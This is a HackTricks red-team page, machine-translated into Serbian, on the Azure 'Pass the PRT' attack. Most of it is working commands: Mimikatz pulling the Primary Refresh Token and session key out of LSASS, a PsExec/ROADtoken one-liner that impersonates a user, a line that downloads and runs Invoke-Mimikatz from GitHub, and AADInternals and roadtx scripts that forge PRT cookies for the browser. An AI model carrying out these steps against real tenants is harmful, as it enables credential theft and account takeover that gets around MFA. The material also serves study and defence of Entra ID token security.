Az - Pass the PRT

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Šta je PRT

Az - Primary Refresh Token (PRT)

Proverite da li imate PRT

Dsregcmd.exe /status

U odeljku SSO State, trebali biste videti AzureAdPrt postavljen na DA.

U istom izlazu takođe možete videti da li je uređaj povezan sa Azure (u polju AzureAdJoined):

PRT Kolačić

PRT kolačić se zapravo zove x-ms-RefreshTokenCredential i to je JSON Web Token (JWT). JWT sadrži 3 dela, zaglavlje, payload i potpis, podeljene tačkom . i sve su url-sigurne base64 kodirane. Tipičan PRT kolačić sadrži sledeće zaglavlje i telo:

{
"alg": "HS256",
"ctx": "oYKjPJyCZN92Vtigt/f8YlVYCLoMu383"
}
{
"refresh_token": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAZ18nQkT-eD6Hqt7sf5QY0iWPSssZOto]<cut>VhcDew7XCHAVmCutIod8bae4YFj8o2OOEl6JX-HIC9ofOG-1IOyJegQBPce1WS-ckcO1gIOpKy-m-JY8VN8xY93kmj8GBKiT8IAA",
"is_primary": "true",
"request_nonce": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAPrlbf_TrEVJRMW2Cr7cJvYKDh2XsByis2eCF9iBHNqJJVzYR_boX8VfBpZpeIV078IE4QY0pIBtCcr90eyah5yAA"
}

Primarni osvežavajući token (PRT) je enkapsuliran unutar refresh_token, koji je enkriptovan ključem pod kontrolom Azure AD, čime su njegovi sadržaji neprozirni i nekriptovani za nas. Polje is_primary označava enkapsulaciju primarnog osvežavajućeg tokena unutar ovog tokena. Da bi se osiguralo da kolačić ostane vezan za specifičnu sesiju prijavljivanja za koju je namenjen, request_nonce se prenosi sa stranice logon.microsoftonline.com.

Tok PRT kolačića koristeći TPM

LSASS proces će poslati KDF kontekst TPM-u, a TPM će koristiti session key (prikupljen kada je uređaj registrovan u AzureAD i sačuvan u TPM-u) i prethodni kontekst da izvede ključ, a ovaj izvedeni ključ se koristi za potpisivanje PRT kolačića (JWT).

KDF kontekst je nonce iz AzureAD i PRT koji stvara JWT pomešan sa kontekstom (nasumični bajtovi).

Stoga, čak i ako PRT ne može biti ekstrahovan jer se nalazi unutar TPM-a, moguće je zloupotrebiti LSASS da zatraži izvedene ključeve iz novih konteksta i koristi generisane ključeve za potpisivanje kolačića.

Scenariji zloupotrebe PRT-a

Kao običan korisnik moguće je zatražiti korišćenje PRT-a tražeći od LSASS-a SSO podatke. To se može uraditi kao nativne aplikacije koje traže tokene od Web Account Manager (token broker). WAM prosleđuje zahtev LSASS-u, koji traži tokene koristeći potpisanu PRT tvrdnju. Ili se može uraditi sa tokovima zasnovanim na pretraživaču (web) gde se PRT kolačić koristi kao zaglavlje za autentifikaciju zahteva za Azure AS stranice za prijavu.

Kao SYSTEM mogli biste ukrasti PRT ako nije zaštićen TPM-om ili interagovati sa PRT ključevima u LSASS-u koristeći kripto API-je.

Primeri napada Pass-the-PRT

Napad - ROADtoken

Za više informacija o ovom načinu proverite ovu objavu. ROADtoken će pokrenuti BrowserCore.exe iz pravog direktorijuma i koristiti ga da dobije PRT kolačić. Ovaj kolačić se zatim može koristiti sa ROADtools za autentifikaciju i dobijanje trajnog osvežavajućeg tokena.

Da biste generisali važeći PRT kolačić, prva stvar koja vam je potrebna je nonce. Možete to dobiti sa:

$TenantId = "19a03645-a17b-129e-a8eb-109ea7644bed"
$URL = "https://login.microsoftonline.com/$TenantId/oauth2/token"

$Params = @{
"URI"     = $URL
"Method"  = "POST"
}
$Body = @{
"grant_type" = "srv_challenge"
}
$Result = Invoke-RestMethod @Params -UseBasicParsing -Body $Body
$Result.Nonce
AwABAAAAAAACAOz_BAD0_8vU8dH9Bb0ciqF_haudN2OkDdyluIE2zHStmEQdUVbiSUaQi_EdsWfi1 9-EKrlyme4TaOHIBG24v-FBV96nHNMgAA

Ili korišćenjem roadrecon:

roadrecon auth prt-init

Zatim možete koristiti roadtoken da dobijete novi PRT (pokrenite alat iz procesa korisnika koji napadate):

.\ROADtoken.exe <nonce>

Kao oneliner:

Invoke-Command - Session $ps_sess -ScriptBlock{C:\Users\Public\PsExec64.exe - accepteula -s "cmd.exe" " /c C:\Users\Public\SessionExecCommand.exe UserToImpersonate C:\Users\Public\ROADToken.exe AwABAAAAAAACAOz_BAD0__kdshsy61GF75SGhs_[...] > C:\Users\Public\PRT.txt"}

Zatim možete koristiti generisani kolačić da generišete tokene za prijavu koristeći Azure AD Graph ili Microsoft Graph:

# Generate
roadrecon auth --prt-cookie <prt_cookie>

# Connect
Connect-AzureAD --AadAccessToken <token> --AccountId <acc_ind>

Napad - Korišćenje roadrecon

Napad - Korišćenje AADInternals i propuštenog PRT-a

Get-AADIntUserPRTToken dobija korisnikov PRT token sa Azure AD povezanog ili hibridno povezanog računara. Koristi BrowserCore.exe za dobijanje PRT tokena.

# Get the PRToken
$prtToken = Get-AADIntUserPRTToken

# Get an access token for AAD Graph API and save to cache
Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken

Ili ako imate vrednosti iz Mimikatz, možete takođe koristiti AADInternals za generisanje tokena:

# Mimikat "PRT" value
$MimikatzPRT="MC5BWU..."

# Add padding
while($MimikatzPrt.Length % 4) {$MimikatzPrt += "="}

# Decode
$PRT=[text.encoding]::UTF8.GetString([convert]::FromBase64String($MimikatzPRT))

# Mimikatz "Clear key" value
$MimikatzClearKey="37c5ecdfeab49139288d8e7b0732a5c43fac53d3d36ca5629babf4ba5f1562f0"

# Convert to Byte array and B64 encode
$SKey = [convert]::ToBase64String( [byte[]] ($MimikatzClearKey -replace '..', '0x$&,' -split ',' -ne ''))

# Generate PRTToken with Nonce
$prtToken = New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey -GetNonce
$prtToken
## You can already use this token ac cookie in the browser

# Get access token from prtToken
$AT = Get-AADIntAccessTokenForAzureCoreManagement -PRTToken $prtToken

# Verify access and connect with Az. You can see account id in mimikatz prt output
Connect-AzAccount -AccessToken $AT -TenantID <tenant-id> -AccountId <acc-id>

Idite na https://login.microsoftonline.com, obrišite sve kolačiće za login.microsoftonline.com i unesite novi kolačić.

Name: x-ms-RefreshTokenCredential
Value: [Paste your output from above]
Path: /
HttpOnly: Set to True (checked)

Zatim idite na https://portal.azure.com

Ostatak bi trebao biti podrazumevani. Uverite se da možete osvežiti stranicu i da kolačić ne nestaje, ako nestane, možda ste napravili grešku i morate ponovo proći kroz proces. Ako ne nestane, trebali biste biti u redu.

Napad - Mimikatz

Koraci

PRT (Primarni osvežavajući token) se izvlači iz LSASS (Servis lokalne bezbednosti) i čuva za kasniju upotrebu.
Ključ sesije se zatim izvlači. S obzirom na to da se ovaj ključ inicijalno izdaje, a zatim ponovo enkriptuje od strane lokalnog uređaja, neophodno je dekriptovati ga koristeći DPAPI master ključ. Detaljne informacije o DPAPI (API za zaštitu podataka) možete pronaći u ovim resursima: HackTricks a za razumevanje njegove primene, pogledajte Napad Pass-the-cookie.
Nakon dekripcije Ključa sesije, dobijaju se derivirani ključ i kontekst za PRT. Ovi su ključni za kreiranje PRT kolačića. Konkretno, derivirani ključ se koristi za potpisivanje JWT (JSON Web Token) koji čini kolačić. Sveobuhvatno objašnjenje ovog procesa je pružio Dirk-jan, dostupno ovde.

Imajte na umu da ako je PRT unutar TPM-a i nije unutar lsass, mimikatz neće moći da ga izvuče. Međutim, biće moguće dobiti ključ iz deriviranog ključa iz konteksta iz TPM-a i koristiti ga za potpisivanje kolačića (proverite opciju 3).

Možete pronaći detaljno objašnjenje izvršenog procesa za ekstrakciju ovih detalja ovde: https://dirkjanm.io/digging-further-into-the-primary-refresh-token/

Ovo neće tačno raditi nakon ispravki iz avgusta 2021. za dobijanje PRT tokena drugih korisnika, jer samo korisnik može dobiti svoj PRT (lokalni administrator ne može pristupiti PRT-ima drugih korisnika), ali može pristupiti svom.

Možete koristiti mimikatz za ekstrakciju PRT:

mimikatz.exe
Privilege::debug
Sekurlsa::cloudap

# Or in powershell
iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1")
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"'

(Images from https://blog.netwrix.com/2023/05/13/pass-the-prt-overview)

Kopirajte deo označen Prt i sačuvajte ga. Izvucite takođe sesijski ključ (KeyValue polja ProofOfPossesionKey) koji možete videti označen ispod. Ovo je enkriptovano i biće nam potrebni naši DPAPI master ključevi da bismo ga dekriptovali.

Ako ne vidite nikakve PRT podatke, može biti da nemate PRT-ove jer vaš uređaj nije povezan sa Azure AD ili može biti da pokrećete staru verziju Windows 10.

Da biste dekriptovali sesijski ključ, potrebno je da povećate svoja ovlašćenja na SYSTEM da biste radili pod kontekstom računara kako biste mogli da koristite DPAPI master ključ za dekriptovanje. Možete koristiti sledeće komande za to:

token::elevate
dpapi::cloudapkd /keyvalue:[PASTE ProofOfPosessionKey HERE] /unprotect

Opcija 1 - Full Mimikatz

Sada želite da kopirate i Context vrednost:

I vrednost deriviranog ključa:

Na kraju, možete iskoristiti sve ove informacije da generišete PRT kolačiće:

Dpapi::cloudapkd /context:[CONTEXT] /derivedkey:[DerivedKey] /Prt:[PRT]

Idite na https://login.microsoftonline.com, obrišite sve kolačiće za login.microsoftonline.com i unesite novi kolačić.

Name: x-ms-RefreshTokenCredential
Value: [Paste your output from above]
Path: /
HttpOnly: Set to True (checked)

Zatim idite na https://portal.azure.com

Opcija 2 - roadrecon koristeći PRT

Prvo obnovite PRT, što će ga sačuvati u roadtx.prt:

roadtx prt -a renew --prt <PRT From mimikatz> --prt-sessionkey <clear key from mimikatz>

Sada možemo zatražiti tokene koristeći interaktivni pregledač sa roadtx browserprtauth. Ako koristimo komandu roadtx describe, vidimo da pristupni token uključuje MFA zahtev jer je PRT koji sam koristio u ovom slučaju takođe imao MFA zahtev.

roadtx browserprtauth
roadtx describe < .roadtools_auth

Opcija 3 - roadrecon koristeći izvedene ključeve

Imajući kontekst i izvedeni ključ izbačen od strane mimikatz, moguće je koristiti roadrecon za generisanje novog potpisanog kolačića sa:

roadrecon auth --prt-cookie <cookie> --prt-context <context> --derives-key <derived key>

Reference

Podržite HackTricks

Proverite planove pretplate!
Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

PreviousAz - Pass the Certificate NextAz - Phishing Primary Refresh Token (Microsoft Entra)

Last updated 3 days ago